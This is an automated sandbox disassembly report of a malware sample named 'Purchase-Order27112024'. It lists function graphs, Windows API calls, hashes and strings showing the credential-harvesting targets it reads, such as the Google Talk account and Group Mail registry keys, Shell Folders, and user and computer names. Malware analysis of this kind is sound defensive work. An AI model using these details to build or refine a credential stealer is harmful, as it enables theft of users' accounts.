                                                                                                      • Not Executed
                                                                                                      control_flow_graph 331 4037ca-40381c memset * 2 call 444551 334 4038e2-4038e5 331->334 335 403822-403882 call 4021b6 call 406f06 * 2 strchr 331->335 342 403884-403895 _mbscpy 335->342 343 403897-4038a2 strlen 335->343 344 4038bf-4038dd _mbscpy call 4023e5 342->344 343->344 345 4038a4-4038bc sprintf 343->345 344->334 345->344
                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 004037EB
                                                                                                      • memset.MSVCRT ref: 004037FF
                                                                                                        • Part of subcall function 00444551: memset.MSVCRT ref: 00444573
                                                                                                        • Part of subcall function 00444551: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,000003FF), ref: 004445DF
                                                                                                        • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                                                                        • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001,00000104,?,?,?,?,?,00000000), ref: 00406F20
                                                                                                      • strchr.MSVCRT ref: 0040386E
                                                                                                      • _mbscpy.MSVCRT(?,?,?,?,?), ref: 0040388B
                                                                                                      • strlen.MSVCRT ref: 00403897
                                                                                                      • sprintf.MSVCRT ref: 004038B7
                                                                                                      • _mbscpy.MSVCRT(?,?,?,?,?), ref: 004038CD
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000007.00000002.2565797426.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000007.00000002.2565797426.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000007.00000002.2565797426.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_7_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memset$_mbscpystrlen$Closememcpysprintfstrchr
                                                                                                      • String ID: %s@yahoo.com
                                                                                                      • API String ID: 317221925-3288273942
                                                                                                      • Opcode ID: 5a56a1554c10d755001c1ca11538bf46cd5ff9b3743cfe338c5787e90ef4e93f
                                                                                                      • Instruction ID: 76d3f49adc6711096ede71316d8c54080aa8a6e72e6628a7d10ff16d2d587f45
                                                                                                      • Opcode Fuzzy Hash: 5a56a1554c10d755001c1ca11538bf46cd5ff9b3743cfe338c5787e90ef4e93f
                                                                                                      • Instruction Fuzzy Hash: 4B2154B3D001285EEB11EA54DD42FDA77ACDF85308F0404EBB649F7041E678AF888A59

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 347 404a99-404ac2 LoadLibraryA 348 404ac4-404ad2 GetProcAddress 347->348 349 404aec-404af4 347->349 350 404ad4-404ad8 348->350 351 404add-404ae6 FreeLibrary 348->351 355 404af5-404afa 349->355 354 404adb 350->354 351->349 352 404ae8-404aea 351->352 352->355 354->351 356 404b13-404b17 355->356 357 404afc-404b12 MessageBoxA 355->357
                                                                                                      APIs
                                                                                                      • LoadLibraryA.KERNEL32(comctl32.dll,76230A60,?,00000000,?,?,?,0040CF60,76230A60), ref: 00404AB8
                                                                                                      • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00404ACA
                                                                                                      • FreeLibrary.KERNEL32(00000000,?,00000000,?,?,?,0040CF60,76230A60), ref: 00404ADE
                                                                                                      • MessageBoxA.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404B09
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000007.00000002.2565797426.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000007.00000002.2565797426.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000007.00000002.2565797426.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_7_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Library$AddressFreeLoadMessageProc
                                                                                                      • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                                                                                      • API String ID: 2780580303-317687271
                                                                                                      • Opcode ID: 7992fcdcafd7ff6fedb2cae98ddd2050c088282ff9ffca5c48e78306170b2e8e
                                                                                                      • Instruction ID: 488ab604db7d7bb3946a6a0ddadc23e58717ff74c8dc9d9f2a6c2f93e1cc5ebb
                                                                                                      • Opcode Fuzzy Hash: 7992fcdcafd7ff6fedb2cae98ddd2050c088282ff9ffca5c48e78306170b2e8e
                                                                                                      • Instruction Fuzzy Hash: F401D679B512106BE7115BE59C89F6BBAACDB86759B040135BA02F1180DAB899018A5C

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 358 4034e4-403544 memset * 2 call 410b1e 361 403580-403582 358->361 362 403546-40357f _mbscpy call 406d55 _mbscat call 4033f0 358->362 362->361
                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 00403504
                                                                                                      • memset.MSVCRT ref: 0040351A
                                                                                                        • Part of subcall function 00410B1E: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                                                                                                      • _mbscpy.MSVCRT(00000000,00000000), ref: 00403555
                                                                                                        • Part of subcall function 00406D55: strlen.MSVCRT ref: 00406D56
                                                                                                        • Part of subcall function 00406D55: _mbscat.MSVCRT ref: 00406D6D
                                                                                                      • _mbscat.MSVCRT ref: 0040356D
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000007.00000002.2565797426.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000007.00000002.2565797426.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000007.00000002.2565797426.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_7_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _mbscatmemset$Close_mbscpystrlen
                                                                                                      • String ID: InstallPath$Software\Group Mail$fb.dat
                                                                                                      • API String ID: 3071782539-966475738
                                                                                                      • Opcode ID: e8255885af10a91bc56e48e40ef87396276e308e7910b77f5f681434f29254a3
                                                                                                      • Instruction ID: a2fd564f6d67a76fe1541fb13c78ccc0c8ee6374decffd3371ae058987aad369
                                                                                                      • Opcode Fuzzy Hash: e8255885af10a91bc56e48e40ef87396276e308e7910b77f5f681434f29254a3
                                                                                                      • Instruction Fuzzy Hash: C201FC7694416875E750F6659C47FCAB66CCB64705F0400A7BA48F30C2DAF8BBC486A9

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 367 40ccd7-40cd06 ??2@YAPAXI@Z 368 40cd08-40cd0d 367->368 369 40cd0f 367->369 370 40cd11-40cd24 ??2@YAPAXI@Z 368->370 369->370 371 40cd26-40cd2d call 404025 370->371 372 40cd2f 370->372 374 40cd31-40cd57 371->374 372->374 376 40cd66-40cdd9 call 407088 call 4019b5 memset LoadIconA call 4019b5 _mbscpy 374->376 377 40cd59-40cd60 DeleteObject 374->377 377->376
                                                                                                      APIs
                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000014,00000000), ref: 0040CCFE
                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00001324,00000000), ref: 0040CD1C
                                                                                                      • DeleteObject.GDI32(?), ref: 0040CD5A
                                                                                                      • memset.MSVCRT ref: 0040CD96
                                                                                                      • LoadIconA.USER32(00000065), ref: 0040CDA6
                                                                                                      • _mbscpy.MSVCRT(?,00000000,?,00000000), ref: 0040CDC4
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000007.00000002.2565797426.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000007.00000002.2565797426.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000007.00000002.2565797426.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_7_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ??2@$DeleteIconLoadObject_mbscpymemset
                                                                                                      • String ID:
                                                                                                      • API String ID: 2054149589-0
                                                                                                      • Opcode ID: fd02f05bf49073eee5ccc1a550db9cbce84ddbb83c717146c7427eb187f58741
                                                                                                      • Instruction ID: e49e2262ea613e2b532621416bf92f05b9d60d1a181aada648b692035ce2a44d
                                                                                                      • Opcode Fuzzy Hash: fd02f05bf49073eee5ccc1a550db9cbce84ddbb83c717146c7427eb187f58741
                                                                                                      • Instruction Fuzzy Hash: C921A1B0900360DBDB10DF749DC97897BA8EB40B04F1405BBED08FF286D7B895408BA8

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 384 44b40e-44b415 GetModuleHandleA 385 44b455 384->385 386 44b417-44b426 call 44b42b 384->386 388 44b457-44b45b 385->388 395 44b48d 386->395 396 44b428-44b433 GetProcAddress 386->396 390 44b45d-44b465 GetModuleHandleA 388->390 391 44b49a call 44b49f 388->391 394 44b467-44b46f 390->394 394->394 397 44b471-44b474 394->397 399 44b48e-44b496 395->399 396->385 400 44b435-44b442 VirtualProtect 396->400 397->388 398 44b476-44b478 397->398 401 44b47e-44b486 398->401 402 44b47a-44b47c 398->402 408 44b498 399->408 404 44b454 400->404 405 44b444-44b452 VirtualProtect 400->405 406 44b487-44b488 GetProcAddress 401->406 402->406 404->385 405->404 406->395 408->397
                                                                                                      APIs
                                                                                                      • GetModuleHandleA.KERNEL32(0044B405), ref: 0044B40E
                                                                                                      • GetModuleHandleA.KERNEL32(?,0044B405), ref: 0044B460
                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0044B488
                                                                                                        • Part of subcall function 0044B42B: GetProcAddress.KERNEL32(00000000,0044B41C), ref: 0044B42C
                                                                                                        • Part of subcall function 0044B42B: VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,0044B41C,0044B405), ref: 0044B43E
                                                                                                        • Part of subcall function 0044B42B: VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,0044B41C,0044B405), ref: 0044B452
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000007.00000002.2565797426.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000007.00000002.2565797426.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000007.00000002.2565797426.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_7_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressHandleModuleProcProtectVirtual
                                                                                                      • String ID:
                                                                                                      • API String ID: 2099061454-0
                                                                                                      • Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                                                      • Instruction ID: 5df47aada64e755ddaac71019e2cddcac14d14db73bdb0f929895f2225ac57a9
                                                                                                      • Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                                                      • Instruction Fuzzy Hash: DB012D01545A4179FF21AAB50C02ABB5F8CDA23364B145B4BF750CB293DB5CC90693FE

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                        • Part of subcall function 004082CD: memset.MSVCRT ref: 0040832F
                                                                                                        • Part of subcall function 004082CD: memset.MSVCRT ref: 00408343
                                                                                                        • Part of subcall function 004082CD: memset.MSVCRT ref: 0040835F
                                                                                                        • Part of subcall function 004082CD: memset.MSVCRT ref: 00408376
                                                                                                        • Part of subcall function 004082CD: GetComputerNameA.KERNEL32(?,?), ref: 00408398
                                                                                                        • Part of subcall function 004082CD: GetUserNameA.ADVAPI32(?,?), ref: 004083AC
                                                                                                        • Part of subcall function 004082CD: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083CB
                                                                                                        • Part of subcall function 004082CD: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083E0
                                                                                                        • Part of subcall function 004082CD: strlen.MSVCRT ref: 004083E9
                                                                                                        • Part of subcall function 004082CD: strlen.MSVCRT ref: 004083F8
                                                                                                        • Part of subcall function 00410A9C: RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00410E4A,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 00410AAF
                                                                                                      • memset.MSVCRT ref: 00408620
                                                                                                        • Part of subcall function 00410B62: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                                                                                                      • memset.MSVCRT ref: 00408671
                                                                                                      • RegCloseKey.ADVAPI32(?,?,?), ref: 004086AF
                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 004086D6
                                                                                                      Strings
                                                                                                      • Software\Google\Google Talk\Accounts, xrefs: 004085F1
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000007.00000002.2565797426.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000007.00000002.2565797426.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000007.00000002.2565797426.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_7_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memset$ByteCharCloseMultiNameWidestrlen$ComputerEnumOpenUser
                                                                                                      • String ID: Software\Google\Google Talk\Accounts
                                                                                                      • API String ID: 1366857005-1079885057
                                                                                                      • Opcode ID: 714fcd6f1c4457602f236ccea557fa2655140a2be8e65fd4c30709a0660f34b2
                                                                                                      • Instruction ID: c9a55fd20ea1a9e1148d2ba128c2c272dfe10edd9ec9a97c612e1cc238572be2
                                                                                                      • Opcode Fuzzy Hash: 714fcd6f1c4457602f236ccea557fa2655140a2be8e65fd4c30709a0660f34b2
                                                                                                      • Instruction Fuzzy Hash: 6E2181B140830AAEE610EF51DD42EAFB7DCEF94344F00083EB984D1192E675D95D9BAB

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 432 40ba28-40ba3a 433 40ba87-40ba9b call 406c62 432->433 434 40ba3c-40ba52 call 407e20 _mbsicmp 432->434 456 40ba9d call 4107f1 433->456 457 40ba9d call 404734 433->457 458 40ba9d call 404785 433->458 459 40ba9d call 403c16 433->459 460 40ba9d call 410a9c 433->460 439 40ba54-40ba6d call 407e20 434->439 440 40ba7b-40ba85 434->440 446 40ba74 439->446 447 40ba6f-40ba72 439->447 440->433 440->434 441 40baa0-40bab3 call 407e30 448 40bab5-40bac1 441->448 449 40bafa-40bb09 SetCursor 441->449 450 40ba75-40ba76 call 40b5e5 446->450 447->450 451 40bac3-40bace 448->451 452 40bad8-40baf7 qsort 448->452 450->440 451->452 452->449 456->441 457->441 458->441 459->441 460->441
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000007.00000002.2565797426.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000007.00000002.2565797426.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000007.00000002.2565797426.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_7_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Cursor_mbsicmpqsort
                                                                                                      • String ID: /nosort$/sort
                                                                                                      • API String ID: 882979914-1578091866
                                                                                                      • Opcode ID: c670c5a1dac652336fc4502d32cc243de18414890d70e9aadfbf467d7e8899fc
                                                                                                      • Instruction ID: 8a1fc52e493d51bfa0df36ad286e8752cb28bf69c391dd95ac0f49afa8242728
                                                                                                      • Opcode Fuzzy Hash: c670c5a1dac652336fc4502d32cc243de18414890d70e9aadfbf467d7e8899fc
                                                                                                      • Instruction Fuzzy Hash: 2D2192B1704601EFD719AF75C880A69B7A9FF48318B10027EF419A7291CB39BC12CBD9
                                                                                                      APIs
                                                                                                      • GetModuleHandleA.KERNEL32(?,0044B405), ref: 0044B460
                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0044B488
                                                                                                        • Part of subcall function 0044B40E: GetModuleHandleA.KERNEL32(0044B405), ref: 0044B40E
                                                                                                        • Part of subcall function 0044B40E: GetProcAddress.KERNEL32(00000000,0044B41C), ref: 0044B42C
                                                                                                        • Part of subcall function 0044B40E: VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,0044B41C,0044B405), ref: 0044B43E
                                                                                                        • Part of subcall function 0044B40E: VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,0044B41C,0044B405), ref: 0044B452
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000007.00000002.2565797426.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000007.00000002.2565797426.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000007.00000002.2565797426.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_7_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressHandleModuleProcProtectVirtual
                                                                                                      • String ID:
                                                                                                      • API String ID: 2099061454-0
                                                                                                      • Opcode ID: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                                                                      • Instruction ID: 9d5022db8ba3b04779ac2e9664088e7462d9cf1087a2f4409b49694314ac1291
                                                                                                      • Opcode Fuzzy Hash: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                                                                      • Instruction Fuzzy Hash: FB21F7114496816FFB218BB84C017B67BD8DB13364F19469BE184CB243D76CD85693FA
                                                                                                      APIs
                                                                                                      • GetProcAddress.KERNEL32(00000000,0044B41C), ref: 0044B42C
                                                                                                      • VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,0044B41C,0044B405), ref: 0044B43E
                                                                                                      • VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,0044B41C,0044B405), ref: 0044B452
                                                                                                      • GetModuleHandleA.KERNEL32(?,0044B405), ref: 0044B460
                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0044B488
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000007.00000002.2565797426.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000007.00000002.2565797426.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000007.00000002.2565797426.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_7_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressProcProtectVirtual$HandleModule
                                                                                                      • String ID:
                                                                                                      • API String ID: 2152742572-0
                                                                                                      • Opcode ID: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                                                                      • Instruction ID: 565c9894d902a96607ae12053a83652f4dbbb150929c791eaa1536a67b179355
                                                                                                      • Opcode Fuzzy Hash: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                                                                      • Instruction Fuzzy Hash: 83F0C201589A407DFE2155B50C42ABB5B8CCA27320B244B07F654CB383D79DC91A93FA
                                                                                                      APIs
                                                                                                        • Part of subcall function 00410D0E: LoadLibraryA.KERNEL32(shell32.dll,0040CF6F,76230A60,?,00000000), ref: 00410D1C
                                                                                                        • Part of subcall function 00410D0E: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathA), ref: 00410D31
                                                                                                      • memset.MSVCRT ref: 00410E10
                                                                                                      • RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,?,?,?,00000104), ref: 00410E79
                                                                                                      • _mbscpy.MSVCRT(00000000,?,?,?,?,?,?,00000104), ref: 00410E87
                                                                                                        • Part of subcall function 004070AE: GetVersionExA.KERNEL32(0045A3B0,0000001A,00410DD9,00000104), ref: 004070C8
                                                                                                      Strings
                                                                                                      • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00410E2B, 00410E3B
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000007.00000002.2565797426.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000007.00000002.2565797426.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000007.00000002.2565797426.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_7_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressCloseLibraryLoadProcVersion_mbscpymemset
                                                                                                      • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                                                                      • API String ID: 889583718-2036018995
                                                                                                      • Opcode ID: 20c56a313fda590c221b6e52e0c08165982b45312d52e9976c101796b2ccff0c
                                                                                                      • Instruction ID: 345612a4203e2947e26158410096d7c3d27216bde768142914c78e2e12d87323
                                                                                                      • Opcode Fuzzy Hash: 20c56a313fda590c221b6e52e0c08165982b45312d52e9976c101796b2ccff0c
                                                                                                      • Instruction Fuzzy Hash: 89110D71C40318EBEB20B6D59C86EEF77ACDB14304F1404A7F555A2112E7BC9ED8C69A
                                                                                                      APIs
                                                                                                      • FindResourceA.KERNEL32(?,?,?), ref: 00410C75
                                                                                                      • SizeofResource.KERNEL32(?,00000000), ref: 00410C86
                                                                                                      • LoadResource.KERNEL32(?,00000000), ref: 00410C96
                                                                                                      • LockResource.KERNEL32(00000000), ref: 00410CA1
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000007.00000002.2565797426.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000007.00000002.2565797426.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000007.00000002.2565797426.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_7_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Resource$FindLoadLockSizeof
                                                                                                      • String ID:
                                                                                                      • API String ID: 3473537107-0
                                                                                                      • Opcode ID: bd954622ed218253ef2d1b1e463bd565b46b01af85fc050a190cf1e92aec0d28
                                                                                                      • Instruction ID: 06b8370cebe37c7de172ca18b7cbf64f7437cd91f528590ddf6fb1777473d23a
                                                                                                      • Opcode Fuzzy Hash: bd954622ed218253ef2d1b1e463bd565b46b01af85fc050a190cf1e92aec0d28
                                                                                                      • Instruction Fuzzy Hash: 090196367012166F8B185F69DD9489F7EAEFB853913084136FC05C6361EB71C9818ED8
                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 004109F7
                                                                                                        • Part of subcall function 004075CD: sprintf.MSVCRT ref: 00407605
                                                                                                        • Part of subcall function 004075CD: memcpy.MSVCRT(?,00000000,00000003,00000000,%2.2X ,?), ref: 00407618
                                                                                                      • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 00410A1B
                                                                                                      • memset.MSVCRT ref: 00410A32
                                                                                                      • GetPrivateProfileStringA.KERNEL32(?,?,0044C52F,?,00002000,?), ref: 00410A50
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000007.00000002.2565797426.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000007.00000002.2565797426.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000007.00000002.2565797426.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_7_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: PrivateProfileStringmemset$Writememcpysprintf
                                                                                                      • String ID:
                                                                                                      • API String ID: 3143880245-0
                                                                                                      • Opcode ID: 886dc5ecc355c3466c5937889f3c24e8c73449ac36ec953dbb08d3698ea6811a
                                                                                                      • Instruction ID: 950c872411b2f2d44c5e3370b52dcf3132a88c3cdc41bb294f16927293e6b240
                                                                                                      • Opcode Fuzzy Hash: 886dc5ecc355c3466c5937889f3c24e8c73449ac36ec953dbb08d3698ea6811a
                                                                                                      • Instruction Fuzzy Hash: A401A172804319BBEF119F50DC86EDB7B7CEF05344F0000A6F604A2052E635AA64CBA9
                                                                                                      APIs
                                                                                                      • malloc.MSVCRT ref: 00406F4C
                                                                                                      • memcpy.MSVCRT(00000000,00000000,00000000,00000000,`#v,00407A43,00000001,?,00000000,`#v,00407DBD,00000000,?,?), ref: 00406F64
                                                                                                      • free.MSVCRT ref: 00406F6D
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000007.00000002.2565797426.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000007.00000002.2565797426.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000007.00000002.2565797426.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_7_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: freemallocmemcpy
                                                                                                      • String ID: `#v
                                                                                                      • API String ID: 3056473165-272240289
                                                                                                      • Opcode ID: f6360f64df0fef16feaa284e534344f6101794aca07d62af19e0e66fd0e0db42
                                                                                                      • Instruction ID: 20c18abb4fba39fec419649699297209b7413d51c31022bf8d4f5bc21a778af6
                                                                                                      • Opcode Fuzzy Hash: f6360f64df0fef16feaa284e534344f6101794aca07d62af19e0e66fd0e0db42
                                                                                                      • Instruction Fuzzy Hash: 39F0E9726092235FD7089E7AB881D0BB3ADEF94324711482FF445E7281D738EC60C6A8
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000007.00000002.2565797426.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000007.00000002.2565797426.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000007.00000002.2565797426.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_7_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ??3@
                                                                                                      • String ID:
                                                                                                      • API String ID: 613200358-0
                                                                                                      • Opcode ID: 0ad1635ea08d581da3d46e9cfe4a801b3f478eb4f35f0f6f88290fc2b5bda708
                                                                                                      • Instruction ID: 5841ab7dcc50b440abd9236b7832042a9d7d1d7b8957bb774bcacf87f05c1f29
                                                                                                      • Opcode Fuzzy Hash: 0ad1635ea08d581da3d46e9cfe4a801b3f478eb4f35f0f6f88290fc2b5bda708
                                                                                                      • Instruction Fuzzy Hash: AAE046A134974456BA10AF7BAC52F13239CEA803523168C6FB800F36D2EF2CE890846C
                                                                                                      APIs
                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00008000,00408DC4,00409CE2,?,?,?,?,?,00000000,76230A60), ref: 00408D5C
                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000000,00008000,00408DC4,00409CE2,?,?,?,?,?,00000000,76230A60), ref: 00408D7A
                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00008000,00408DC4,00409CE2,?,?,?,?,?,00000000,76230A60), ref: 00408D98
                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00008000,00408DC4,00409CE2,?,?,?,?,?,00000000,76230A60), ref: 00408DA8
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000007.00000002.2565797426.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000007.00000002.2565797426.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000007.00000002.2565797426.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_7_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ??2@
                                                                                                      • String ID:
                                                                                                      • API String ID: 1033339047-0
